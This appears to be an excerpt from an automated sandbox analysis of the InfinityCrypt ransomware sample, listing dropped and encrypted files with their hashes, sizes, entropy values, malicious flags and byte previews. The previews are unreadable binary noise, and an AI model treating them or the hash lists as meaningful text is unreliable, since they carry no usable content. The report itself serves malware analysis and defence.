                                                                                                                                                SHA-512:C8FC74FDA093D41E0CEBD3AB6243BE05E3CFBF98FFBB4E7604F78F704ACEA3BC0AB6C85ED1D7690AE0B5BDB22A648DA034C979D7866CC1ABB39FF03DB198A652
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:s.T....8......;....9!M.L.$..P....:iPV...SE...:(.S.(._.N..J=..+..5.TO.Z....Z]......T.3fr.7.!.y..r^.c...'......8..6...u..r.m..T@d...G........;.....`..j_l..w.../D.i...m2..0(..5lX.=..A.$.I......"..!b....J...G...z!.?......lkl...Pz.L......T..J.|^....g..]..e..1_...3e.m....j...i...[4r.X...V...R.......5.2.\p.S...c..6>Q.D.0_..f..2.q?.k.](>.<.....X.r.\j.?......^.O^.sn...eu....#Z...C..@Q /zM~.p7Im=?.{.....d.K...R.r. .Z.{...n..iW.?.#9._.My.L{.*csW..a.gm...H..]..;;....=L..y...faQ2.d...g..s..s;._..D(..M..=.a..g..i...1...."D.7q.f.1EZ50.....F....G..\.)[.....N.=6:sO..v.p...~~..`<..}.D.............w.?(...].y..k......~.TVR]...".[x..S.k...:........L..J.C.m..*P.k)+....e..v...8wc..C......T..$../@.}U..LE...K].d.P..j....1...t.dP.,.L3....Po`'....[K........'.&iN.*.l...g|..Mx.._S.$O0.....;...-.m..}hw..3+...V..m....\.l ....5,.......Z.?W...h0....[.M..~?....=.G.KF...A... .b{..B.P..6.l.b..9RB..P.'...:...!IqQ..=.......2.....L...' ~..Xk,a,.B1..|...~..'..&.^.".U..j...jM.....bfO.@.+S..i.....
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):832
                                                                                                                                                Entropy (8bit):7.738013701258224
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:/fjfJYxmCFoAVMM736VLDu73jEZPMQZUdSwvJFRxfkBxySWuDiNY05FoAn:3NY73VbWBu74KQ4vrRGxsuDiBFoA
                                                                                                                                                MD5:2EF192ABB1F7F171FA729D639D28DB28
                                                                                                                                                SHA1:1FFEA8BBC6170C52C704DEED5A9851B46DC3FA69
                                                                                                                                                SHA-256:3AEDBA987079134C1E0D17F51E5AC8BDC61A5044B89B88E99EB9748F5D974B0B
                                                                                                                                                SHA-512:69B9FDBF28C62A9FEBD8C801D0BB53968F80CDB55753636CC41926D8E450D48EF088C2402DD15CB0C740B08CDE1915446DBB1C526792D4E6BFB488FD02459037
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:v...$.................UT..Md..sN.HGD.i$....S.m8L.~...........E..S.....}N<....q@.b._.\Y<.O..3.........._..<._.a.}g.%...n~..........$.|.M..H.`1.4.........`q..J:.P8..(.<...4....<.^=:T...w\F=..,.A........@.L6U.E........i#.sW...#+~M.....]..6...D....}3.._.b.O...|...p..1...\.....R.y..Z.Nh]I.;.M#79..u..LR.).t..U.#S(.._2F..,..b.....6M_.;.$-.eL.o......Pm.\.C.B..B..D....o.XH.....N..:...;z....?.....%p...H....{..x#U....5..E.%........W.....u.A;...g...E.D{.^}.fES.I.,....2.=...FJ..|.........`......AmG{.....1.-..h.......<.{..U....sL.y....<.:G...{}Ru&W..~.'...z.5.P......Eu......t.............vKe.P@m.g.!..}..........g.#....'.V.....f..pJ....?m(...*UU.~R.p....N..<.6T.zr....T.]...k$..[......./.D:.K/<.?+.'X..O..t&.....O.`.....O:...}6..()..mxW.!......f..B.2*..Q..%.6...1..u........'. .^I.....u .y.8.k_.7x
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):240
                                                                                                                                                Entropy (8bit):7.023339060251651
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:R9DwZuM+uqjduLNFTH0jP+C3Lgu61XYOx:RhwZKuqjgLNFTo38B1XYOx
                                                                                                                                                MD5:81C26361AC4B8E15004E56ED305E8E1E
                                                                                                                                                SHA1:8FE625DEC20C883D895EB6D03771BBAB90DA9911
                                                                                                                                                SHA-256:8374D7CBC8BEEAB0E2CFB6C0D6250AFA6F7AEDD36B543569F8BC429FABE20809
                                                                                                                                                SHA-512:4973C59ABDA6158C1A48E42A4D22D4A26CAB7929C504E86C921A4732DECB44FD5482DDD704D6E9F7663EC3933DD66B6D805A7E89FA60717E7BD5993340AC5FB3
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:O.b.b....Vs.S.x.v.......h/.....*.7.....!...s..-x...E.S.b41..........u...@.}..f..5...z6.n.d...o.lwQ...w.*f.6.I.n(...Ekd.j..{5...fS6..>..E..3...e..j........D.=.\......-QE.4..........Hg.|s.{...M...j....=.U.I.P@E.=!...f...S#..(.MPCT
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):624
                                                                                                                                                Entropy (8bit):7.607747244413057
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12:5FQMpwcfOK3yudJt1aSpOeGHEYBW8B9kRKqoDNK6xlGeSEBIoQfPdW78nSn:5u3clPJt1PpOeGxjgR7oDA6meLI/UuS
                                                                                                                                                MD5:6199AC7E92AECCE0404638A1E90E3D16
                                                                                                                                                SHA1:6516C768B460411263E160AB287B7A41722F17A3
                                                                                                                                                SHA-256:9BBC8BB526BA9B055A11A20448D1CF3BF64556DAE86985B559CF67610E39ADAB
                                                                                                                                                SHA-512:FB1F1423CAE7F4DDC44CBFAAD71CE04FCF9AC44D287D4997613D1479F541F499EBFBD5229E1458D4E698DBFCAB72E2F9E84F8CAE1D5A0D42B452C730B33E3833
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:"...<=M..K.>'..sw..........p.m6x...%,e...j}.3.U.e&.2.S..7v|.>.2..*...B...*.}k...B..x......aO`G..dN+5..r..F...=.k[e.$.P.ez.0).+......5.tk:.AC].......d.@........'.....KO\.{....=,.....6...%7.v...4.=.k..Tt...C..e.6.[.o4.L.[9.o........T.f....y......$..a..B........'......*..ND.lH`P>..>...*p..H.5...i4...oXOM.]...z...`..+5.Cl+6.M..S......4.....T.....O...YBL...D.....y...k;.0V.xA...".M.t+.J!..9.L..z......Z@..Q.)......*{.apr*m.|..mMa..i-..@L#\.9....|w..<i...K...v..,LJ.=.JkJ...=7.#.\..|.*......tf.D.....qS...H...z.`..U...:@7.?6.........>.-.,.....m..W.X%F#.u..A..<...........%...z%...W.....A..vCN9?KY.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):848
                                                                                                                                                Entropy (8bit):7.767893258513224
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:ugTxWljOiAq2v1OV9/f8C2Cfa7qFFRC66mjEpxDwn:ugTGOiAqwnC2CfPFG6NO8
                                                                                                                                                MD5:025337802EDFF72A4F415777D8019AE4
                                                                                                                                                SHA1:B11BD044CF31250A52729C69869A9BC34BC9C3E4
                                                                                                                                                SHA-256:81CE458196CF43DA1FC874ABC6B78D429D21B385AE1F380A8175BCB09157A6F0
                                                                                                                                                SHA-512:BDCD9253199B61FAADC25F1C0656AE42DC36FA5D900BCC347E69877D8C6324839CD483035C796BDD890DEDAB53B507500D4AE8D7D4ACEA12619B1907A09E6F4F
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.....!..8..>d......o|fa{.Ds!9...Q...q.T...r.....JM.R.0..*?D...qF.....$8$&......w ..h.....Y..J?ms.{0....y.o....l.l.D......6.,V&.b.PG..p.D....e....$.Q.5:..........73..n..$....p..i..)W. ....)......P..oj...#.Wi..R...m......^.n.....:.....>F.n.n........0#1..q.~.I>C....x ..No..$........\...j.A..[.89.. .Xx..........|w..n&.-\..|....U.\...O2d....)qz.....l..\..Y.*X....S#....|s.?Gko....A.9..l}7c.UU.....:.#L#...24..w.. ...|7....z_..4j..(bl7.O...C.y..4.b.U....l.&</.R..k....p.D.3i4>e-~.e.q....I.V$....;.QO$.G..."./...xci..jh...K=.....m.5F....9.....[.A......^2..0..(....Opf.J..Yl5.b.&=.Y..n%xf1#..<h.U..)d..2+.. 5t.R.8...b.Z.%...s4..&m..#.?6.~9$W6....-.f(.......X.\+tm.uE1.fm..;.X7a....?....3.RoV.?U.Mc...?......[.a.H..<!7{.ue..&Q..n.".0eG_`a..GL....GM.A....*.....r..&7.#.F.b7X..F....X..,.cI.......x....../.d 'k<JI.t...*...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):15794688
                                                                                                                                                Entropy (8bit):7.9999884031712165
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:393216:+ExKFTS6CEK/W2bztxir1xmgPPa+LcghSlcvshSkeJ5+BM9:vxKFTzCEmW2ntq1FPPVQgQlcvsn85+G9
                                                                                                                                                MD5:B8657A831453302AB70A3973E7FFD0AB
                                                                                                                                                SHA1:5F3A71958FCFF8DEC44A01659A29D1B6A190C6EC
                                                                                                                                                SHA-256:56C00293689FC3A8A3022764A4A4041788752BD7749180B174CD01B000293F00
                                                                                                                                                SHA-512:7119E4E92711EAE2749C71525CCC7F6F954287EAE5F0B897467540B325E790E23F23CF1F8A7B1FDBBFE3C97B7F7420B502C627D9BF3DAD3B46D351A249D5AEE4
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:...Q+...,.`y.p..m)..Y.....k#...o..M..;.T...q.}.@..v.[..#^a.@[.u..%c...A....h3....0C..k...*[l..e.H...X.[g...&....\.ug&.o. .`..0.5.v10G4.=6E.(....w...O.C.l..8QB.......^.dS..!.a.........)../..rM.+)B.[.{..3..E.D.X.."Fbo..Tth..3...kqv.....S........>.m..F6.9......."|.C.`.;.z.w|V...$..l...+..7,.<.'4.-..Ls0..i..z &.t7^=~LA.w...9W.]...a.......N.q0..;.....4..}....#F..z....._..w.hj..ST.}....J.$.l^.X......f.......j....h....@G4H..}>..O....8O..:....B.=...B.R.Am.|.;..+@.....~........*D....F.5....I.+.m.......j.6K..9....|....F.@P..On..\.l..[.}.E....I..s...^.{..8..b..?...O.~.T...Q..F..Qa.r3..Ey.!..4.6..FD....vRe/.T..?A.j.o.{.#.OL..Y.A.....k.....?(.o.O6.Y2..u....u.o.q.J.(.V....q.O.|>F.V.S....rQ...7]..PfSf..7..k.c....z~.BW../8...:..H.P..:....w.y..k.o.=7.T{..x.}..%.^#|.zb-..t{Y&.;.(.X.7lk..ow....7k.U1.1......o..Q.....V3.r.[X....%....{=.9.k5.g....|K..r.%G:..D....h.>$.....u#..W{.{....\...9}..N4)...x.Dm"..B.``...tv2p."...i.z....S...(.BG2-v.QO.|9mI.4.4lj:3....*..
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):14048
                                                                                                                                                Entropy (8bit):7.98663709842336
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:JxlzhhTMKytgaqpMeatBbhfpzq/sHycwUqtRIj:TltJMKQgxotf8/EycR
                                                                                                                                                MD5:5FFBFFABF85BEBF7D5D44357D8E17644
                                                                                                                                                SHA1:876CE84BDC9B3E789DD0E4658F6F9113BF3ED6F5
                                                                                                                                                SHA-256:691D21C4842B651240EB3314645CDF035C65ACB31A36878C057433DA6F4E237F
                                                                                                                                                SHA-512:C7FF0FD77CB3903225FEFB0CA48D7EE37CCC5CDFBE4EF15F9664084F35BEEF5E3C96C680AA7CB905AD79FD0F403B6DD9AF079F37AFD58AF5D0BFEF616AD25504
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..__....u...M..').-.._?B...:.W.8.4.....LXH...."......>M.wC...ca.L.1o...A..xj0].v...27...&......0.$|.....p..0"..yi...z{..m..Y......K..;`..L(x...o.g#..{.lvF...:a.V..U..u.b.+.yY...q.(n..D....&dd~m.$.....)...J.R|....k.+.z......E1.. ......(lz.Bm.`.9.P.F.&.O......\g,'..m4...[="G....CVy.2........:/..~.~......?.9..{.7+.'[..a..6.?jc.. d|KN....W.]....;.rH.HIQ.?X..y[.<(e...s.L(5Y*?.}..(].rDh..T.^.c.......CI..)......b..D..wE/Y+.....P.6./v.....vx.d&.[.K...r..!wI[9>......:.<,.V.R.gHD.%.@..<O..s.....)...]....=...D...V..X.UI..T.....Z..JF.u/.p...lR..^2"0ARpv...........x.8T.i.VG...%..M7{D..K..AX...V...U.....O..6.-yS.(..E..f/..u...$.&.HS..Sj.4.R..P)..b6~e.....Wh.W.K2.*m4V.....3R.r..@P..../8d...0..I....I......}e&....`..JF...">.0.&...f...}9.w..k..f!....@^{..8X.CD...}.p.C.\T.8...,A{._.......8...lyka....^.P|k..<...E.c...Wx'.k.^..H...4..ex.jg.6...cC.Z...0..:N,....K.*[....lK....Ytq|~T..K.. ....I.|....Tso.9Ci.]...AQ......Y.Y6.|P
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1856
                                                                                                                                                Entropy (8bit):7.891050042799802
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:o7wl3kkBf8CD7bpYGx0uyM6WfJs50DnnJ:f0krjOMBfqQJ
                                                                                                                                                MD5:793941CB6A31DB30621057A67AE20A61
                                                                                                                                                SHA1:251262153477B78AE15A64CDDAA9CAC99A5D6231
                                                                                                                                                SHA-256:D38B1A026AF84A941736CB0954085E8B98D2F61CF1C47436CD9F27BCB95922FE
                                                                                                                                                SHA-512:38362E42E009E732612F709238AB2C13EDA3163E9506EF9AC85B4EF5047E4BEDB19177BFB49E017B478108AB190B646BA7BE9661508F1A47DD173F51C5BA82E2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..r/p7.......R.*.6..........!.M...y..+Q..S....%.g.J..o..c..3..xCN#..}S..@...T.W..%]@.f....yu.{..r.uC......q*..O..:.....-g..:.D...(.)I.V.. ..y{...n:z.=.w...........{...P+..*..&2sRU=c&lO.......]e.!.'....5.Ng..s..G.....+.+.)(..;#..u.Q........Z.......B.?Rw5.g..^...j......T..S.|.,s.h..w`<.8m.1..E.<............r.4c.D2....r..1.\V.8.*.*.I..%.Ln.{......._....-.7.~.B..|..%m;..9.[O....;.D...6J.E...... D....|?..[....`..........,.I.lv...a85...^<T.._*C..|.<f-.....-07....7..G..E}.cli.2>....D.Ck\R.$..ePb..P....2..dz...-....R...,^...<............CP.....z.]L.h..6..1.5Y.f..c...R.y&..w........I....Ub..RF.)F.X.._0.La,25..+.a.~G... Q..n~..<~..+....lJ.Z^<.'.g.IYL7.Nx......`...[...;.[.?.s....T..:..eC,.t0..~..0....H.=<4.M.C.......#h.9..@.I..$...7?P.l%...3....,J..(...9.....>. %....U>.\.S.Px.2"X..|....@.^x+k.@B._@y...|..)f.......2..Q).l...h&f.[......@0........QU.S......N. I.-c.?.]..f.v...l....aj.c32...b..6......=...u....u !.AT^.&bu#.0...........T.+.uv#9*......I
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1920
                                                                                                                                                Entropy (8bit):7.907244608474836
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:Pq32ZTX7yxc+/VyGdbZVaHXKhhlUv4fmFRct1fBWR:SGt3+/Tdbw6ryv4eFRupm
                                                                                                                                                MD5:876C12EF78CBF3A1217C00E0FEBA077D
                                                                                                                                                SHA1:F8D0F4F1215BAF0953C28B15CF066762E3F498B3
                                                                                                                                                SHA-256:6338E7EE16CD5F6D17CFCCAA8AD0789F9418097EBC2B8D98E2E9AFF2831A81F6
                                                                                                                                                SHA-512:31A0540165C671C362BB080C49CF77A7C2DBB1D562559651C83E95454D66A5904E3BD648011E7D297FCF2A0004D019CC8D982E24705AA8EEA5E334B8BEA7D2BF
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:........H..=...k.0...0.w...!).. b..df...v].p.<.....Z.L.\O.'..W...t:P..,......C`..._....D...;*kQDc.,..#V.c.......4.....r.....$$.;.....qd)B.'...<5...).Eux..R.&..&.9......'.........s...CO%.D6.@..U..X.....#...r[....p..n..6..*..0.lhu......x...^./.Y...5.eY...F.l,./.n...3'Y(.....k.....[..uB.hP.....-w.2.j.G..Y.;..##..L.......-X...,J...2....*..d.`H..O..-...........*.`....x.n.F...X8cPM..O...D."3.....g.!=...A....f..,....n..g.&{Q......E.....Y.XL^...e\.y&=XvP..tc.t.....Hi.L..S..)m.6.$:4CY.cy..8kCd.&.l..\md.)...s.]6..h/{...M...;,p..c...)..........U...%...h..l[.K.H.A...v..-..:..,..c...&.K...$.c=.`vJ..7.t.....g..M......nmp..~}%...q...r...m..5.{..h.6.......f.X..}.....g...m.....8.I&.d.m..$. .,:I.%.....*[<.[]....Q.4.<.......)).f. ....."..B..F.|1>...4.nxv....k3/..d.S.&'c... N..5v.i8.~pt.B...S.d.:....>..am&.@u@;w..p.9.5..".....k..G.5`#n......e..79...1.....{G .......}.eL.i...3~"....v[...W./.u....;..K.x...#)..h....8c....4..MA....;.P..}.......1&..5..Yi..F._...3..V"
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):761296
                                                                                                                                                Entropy (8bit):7.999759064276536
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:12288:RHyBgoZo0mKT/dZf76EzZB/BQietswHpBN+hlTEbS/RbeDF5JD1PfVKS0KBS7pct:RHyBH752cZOis+TbbeDFTDhV9QppXO
                                                                                                                                                MD5:D323744B704252589F913A72F58A35AC
                                                                                                                                                SHA1:AD93531D8C3CC616E726524C6C8CF1BEFF53CD65
                                                                                                                                                SHA-256:ECD80CCF68326C02F05D94FB34EC6F18913EFB836615459AD12A9EBD7D9DF8AA
                                                                                                                                                SHA-512:C9A1C223F96CE410DD4849A6F82CA00B2A6876EB7F583204563338D2C6E0981AA1C1711575DF74DC469B95B2B0E2818A92CCBD4EAC1456A8094210354FB4D093
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.z../....&.N.y..q:.Q.'..T.2..1Pj..|..B.>m(....7...x.s.;.d.U@.b......R...S+MMq-@.jRvu...w.e..B}%.t...=s..P*..2..M#h.....g.8....|...;Q.x..d. .\'X?..tOIT......V..t..........+;Z.4.......y.U..l..e#.#...263t.l.f..*......U.K...Z.f.w..,..q.kE..R."?..w.V*'e.w.G.....@.O.;.q.......t.P...^h.n.Z.5G..Rq.."=..........+.._.d.X.}.A.KX!rW....n.<.}.n...P.....s...G...0qQ.....y;....X*.p..D...;.dm.h~#..@...6...S....h..BU.+.!....u.z...C[M......h...D......&.Q.}7........J......W.b#..*Z.6P.az_YuG..&/.X...R.>.GMK^..8...TeJ9..(rl5.o..{O.r.....#|.1H.w....9..N.. 1.&...0..x.B5...b......@......~..."F%4....A.ga.P.*.....k.y..q34...I..I.4%yMY....i.^>Nt..\}..c/. .3..]d..|.c...>.kj..'.X...CZ.~l-..T.><.......G.......y.L..1e$......8Z]...a...g*.....*........ ........\.B.$.J.Hv...\. .%..B?.h...+.._.._.y.......BC+.Xp4...v*Q..XDR.,B...v.Q...f....[.....J../o/...#9.....q......p..;..m.2.;.......Z.\...~.}.j...........7..gBY.<8...4..uyW<...7..4..o.....[.U.:)*..~./.?...
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):279936
                                                                                                                                                Entropy (8bit):7.9994098562272375
                                                                                                                                                Encrypted:true
                                                                                                                                                SSDEEP:6144:TL9fqxEYnmy4sObrnDsWhbX1muB8IwCP3pIwCP8yB/tYwIPKmGQct:TLJkSsWmEv3po8ylBOKmzK
                                                                                                                                                MD5:DD1E7DF94DCED311C36072A5B158BB22
                                                                                                                                                SHA1:81C97DB2BCC9CE21239B272356D03FC659E75866
                                                                                                                                                SHA-256:E667C71EF7CF2B433B5114EB470C5A48F6C644308DD535094307603DF6436C29
                                                                                                                                                SHA-512:49886462C62B8445070EB9F2CA6E92E76D0970C57A8424C7FFDB551193DEC12F5528B5FEAFA72AE594DE047E14809C38101BDF8BA5C1C841818D0966EC8239EF
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.D..Vj.L..Y..h.V.t...j\w:.....d........I..0...g.L..Y..Zjpk...!~..u......JT.....u....X0j...+D.....A.*k.t..qg2.%..F.,0...X..'.@s<y..^xjw15.O1.[0~...,.xn.e.I7.._..........q.f3i.7&.{........0.\..D~hW.g.....5.....*.^:s.(th'eY.4/....B{.&..... ...EfZa..#6..!..S.x.|..g:e].Y..dgv9.>...Uk.F%"...A..w.2.82I..:..Am......x-......5.5v.T...>J..5.....Q.n{u/i%...*.k....?D.n7.;ia.O...HQ/.^.....r.....Mw!tJ..........kc..@.5@...........".a.#.H...CU.y}w..3%p.).D..6........r.U...[o..t9..M..h...Hb../]a4b...6H!..2..Eg..OAD.48..,a...Bup.:..%-...c.....`..../sZ.&yHt*....w.....c7y^..][F....XVT@.....[9...n.......x\?.....4to"......N......4.M..z.4bT........Bg..e,.W....&.:uI....h..-jgwN@..]k..#.....+3.T.8..'....\..qG.>7...C.0O..<u'\.....*j...;Ff9.......P.J.~6JA<?.....d.6.$.,...W........=Q....@,j.G..y..#z..^..R.....C..5.....b.M.7...,#.H0...WDC.@.3..-Q..^._.....!.......k...K.....9.j..K...c...R*....V..e.2.S....^.k.v.9+#.......t H6.].8X...c._S..C5R/..L.f...I...cr....j!.4!.c
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2720
                                                                                                                                                Entropy (8bit):7.93215484712665
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:QE7vpZci29JlCZZdcwuDJJY9KHUOMbziH5aTEir6AILmZ2SqA:QE7v7ci4lCZ3uD896GsVirySZ20
                                                                                                                                                MD5:7944984CE5E1C421B6BA30EC3D89F6AD
                                                                                                                                                SHA1:4FD960FE08079CAB4538D7D2A2EB56C6A3CA0B0F
                                                                                                                                                SHA-256:EE32F99BFE7FB86DEA0712A45E6B07B09A3A3A2A83C6977124714E89698A61F5
                                                                                                                                                SHA-512:C4FC0B78F78527F9CB17877A5B1667B83EF672E1ED533DA306734C9639468DA5B398B5D57AF438E05029B6D2ED69E047880876765FBB5ECB825FDF7E428FB223
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:.qcF..%....{.<..:..8)Z0.)/.B.6.z.R=....G_...T}pi./...p.E..NA?A....`..Wp+.d.]..&.*.-_.6w. ~..|.q?.i..E.).E.......[...ci.....+%........FX*.....}.9y.....Z...........qUb~.r..R.Y.....MG...`.P.F.5..|..z^!.^&^..a..p..j...#....$..A...!...J....J..`.x2..\...G`...N....~..-....z\.e.5.5...~.^..x.l'l.1.....D.(D...A.._3.be.r...j.Y...-..U...~..?..y.~.H..$.eT...lf*...a...<X....`..3....+....)X....#..zn...!c........D.[.l..Q.".Wx.....2.Z..kK...6#4......A....._..._......I5:.Mi....J5.....'z..e n8UX;.....0....w.g.?....._.....b....Z..X.cA..x.M?O....3}.&..H1...*..#.$\./... ~..E4....;...99....T.@.2%...+........C.....g....C.w..Fn$......[...7....zT.z.......~.x.v.{.KO.|..V...%YZ....D..<`(......./4@.qh.|..}..>.|.....{...n..a.z@....C..\.....`C..9g{...{.;.t..`.h.w.e.D...k.3.T{{.k.g...&.N.y..Xkg.}..U`GuZ..8.z.]...t.....1....eL.Z,..,..\U_.[Y.b4..D.0...5...a..P.4,.=..P.!./"&!..Bp.....`L.6..M...?..5.....#.u..A.)..).+.n......E{.yz"V.Kj..kD].A..s...S.1..cz
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2096
                                                                                                                                                Entropy (8bit):7.908107044170251
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:V9ax/lOMEQ/HTYn0t+A5LeSMsJ43ODi6qx1NjqIDYd:CdbvHsIfvyCqnNWc2
                                                                                                                                                MD5:3B7D7BB3B9E9D892F2A6B70427DDBA37
                                                                                                                                                SHA1:B7E9F06ED1D9A2E19D3B24453C70A7D76A3C5152
                                                                                                                                                SHA-256:506AF06A3F6D90CC1335CAB454D889EC73D8449D0D3E640681D6BDEBD1285278
                                                                                                                                                SHA-512:BC62BBBFFC4EF12A9B159CE1533ABFB4EDE0EC42B9FE954B6524686AFA73F42348A1E3B5897F53EC644F49BCE7635FCF36E9BB55A305AF419C99745B25FF3017
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:x..nr%@..&X......kp..'..k..{c.H........P.!.^..M8.76O)...A.G...Z....v.3.t.2y&.l..<.(k..y.....s3._.$....{r.......'h.j.urq.7..3.i.....d...o. ....l....$j.....2R.t......Y..o..#IL+....~....1l....i_%..._.y-..+..@..%..s.A....a.b.f.....9g.(.}.t.b......u....M...f.......!....=&..l.^:.......Sq...!.&Jj..k.$;..=.u...@|.A.V.%..x.!./i..~.8@.#.NN....|.}.A.......r.-..a.qv.B..~@7fd...Y.#....u....X.....%....>6.....V.S..<..W..e....nl...L.S(..\......N=';.._h&..x.e.%......+...Kl.7...o1.PI....I`..HEY...Ty0.x.hq<......4x..K.8i..+>..q..."!z0f...d...3 O.d.B../...a.p..........L..Q...k.^..:.).r[h.B.j....S..h(..0..?7..5z....0...:.%2.TTi.:*.]O0.w.k../.$i...ng..$.....A....~.l.....,....w7'..vx....5.K.u.v..'.l..Pb.54..........U....D6..).....v2/.1|&...'g.H.....(...._.u....9O..lV.O.v._.>.4.N...He...Sx1J..jv..f"...KC.J ..kk.(...$.A.?t&|-I...4$t.....N,..&.G...%q..}.*t..>f..$vs...Ni?.".{|......b.'.C|3.x2v....VA.....6....\.z!f\.....i.25..D3i..."..n..k?$...t.<D..P.a.yp...Q..%.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1664
                                                                                                                                                Entropy (8bit):7.89287519503577
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:pKI+HulJs9E5qBOeCSAw/QVKH6mrcna3J:PW9E5inaK+na3J
                                                                                                                                                MD5:F08C415382C400A1E2A5B5D2EDB9347A
                                                                                                                                                SHA1:2A87AB3E8DBA54D43A857FCA21F4E19531664C45
                                                                                                                                                SHA-256:96FC02859D2E4983DF4B2E83A7E2DA9C6740EB0D1DA94ECA9501B60B35C14803
                                                                                                                                                SHA-512:331105E94C17D2A8748473271F7EDCC90791884206499E6492AB7FBB622C2AB22382D3B4B1FFB9AF666C6955E9EEFD3FF82CC47F6ACDC6AC315DFF3E5213B1B4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview:..JI...".......i.#..Z.........C.A.W.w.......-.............2.~..(e.....I..h_..3..)..:..l0.lx.~....s...%..t...v.n..s.l.&..O..`..z.Ph=..^!m.v...&_=..GA.F...b..-...s..rH^.. ...q....?Y....|.`..^.Z. .!z..8.?.....f8.(u..-......5.1J....|.Dp.........7....;...z..e2:...7~...sx..5....4J9A.a..r..G......j=....8.m.r.~..h.....-o.B...j]...N.\.6.aj..[l......G.tO.r6 .!7nC.....~.,L..v.~..._.....T...3@...Cu_].._..i.......|.....-.(.t.....R(..A).......X%......Tnh..v..X....O.....[.....V..;..e.G....W...k%.. ...N..".......Aej.....6...zvP^...&C.N......&.=...B}#^.]....j._.G.........yo.I."...S...Ly.zH.-A.'.r/p...H..4.+.z.V.U.....*.."?...H...b.'..2......#m6H.e........zbo...e.T.6.G...e.0-2...mr.z.b0..J|.....e..}eWUY.}I.;.C......} .H..(....@.v....MN..r..}.E..4.....7....i.........b.*.bw..|.TD.8p.._.%z..-.J..9)....&.d....<,....7*..P...TC.^...Oa......o..U7&.5c;..$......$.z!.U...E....Wn:.7.k....-...l..*..x.:7.5...E.e.8.%...a.P5%...iB..'......%w.op7NJ......R...F..p@I.3...k.w.
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\0thmgnhb.zbf\Endermanch@InfinityCrypt.exe
